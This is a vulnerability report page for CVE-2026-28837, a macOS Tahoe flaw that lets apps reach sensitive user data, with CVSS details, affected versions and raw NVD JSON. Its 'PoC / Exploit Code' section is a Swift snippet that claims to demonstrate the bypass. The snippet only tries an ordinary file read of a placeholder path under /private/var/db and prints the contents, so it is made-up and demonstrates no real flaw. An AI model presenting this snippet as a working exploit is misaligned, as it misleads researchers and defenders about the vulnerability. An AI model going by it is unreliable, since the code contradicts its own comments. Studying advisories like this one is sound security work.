Security Vulnerability Report
CVE-2026-28837 CVSS 7.5 HIGH

Published: 2026-03-25 01:17:09
Last Modified: 2026-03-25 21:28:58

Description

A logic issue was addressed with improved checks. This issue is fixed in macOS Tahoe 26.4. An app may be able to access sensitive user data.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE
macOS Tahoe < 26.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
swift
/*
 * PoC for CVE-2026-28837
 * This code demonstrates the logic issue where an app can access sensitive data
 * without proper entitlements or user consent on macOS Tahoe < 26.4.
 */
import Foundation

// Simulate accessing a protected sensitive data container
func accessSensitiveData() {
    let sensitivePath = "/private/var/db/YourSensitiveData.db"

    // In the vulnerable version, the logic check here is insufficient
    // allowing the read operation to proceed despite lack of permissions.
    let fileManager = FileManager.default
    if fileManager.fileExists(atPath: sensitivePath) {
        do {
            // Attempt to read the file
            let content = try String(contentsOfFile: sensitivePath, encoding: .utf8)
            print("[+] Success: Accessed sensitive data content:")
            print(content)
        } catch {
            print("[-] Error reading file: \(error.localizedDescription)")
        }
    } else {
        print("[-] Target file not found.")
    }
}

// Execute the PoC
accessSensitiveData()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-28837", "sourceIdentifier": "[email protected]", "published": "2026-03-25T01:17:08.690", "lastModified": "2026-03-25T21:28:57.770", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A logic issue was addressed with improved checks. This issue is fixed in macOS Tahoe 26.4. An app may be able to access sensitive user data."}, {"lang": "es", "value": "Se abordó un problema de lógica con comprobaciones mejoradas. Este problema está solucionado en macOS Tahoe 26.4. Una app podría acceder a datos sensibles del usuario."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.4", "matchCriteriaId": "6CF848CD-25D4-4371-BEF3-1ACCE47AD81F"}]}]}], "references": 
[{"url": "https://support.apple.com/en-us/126794", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}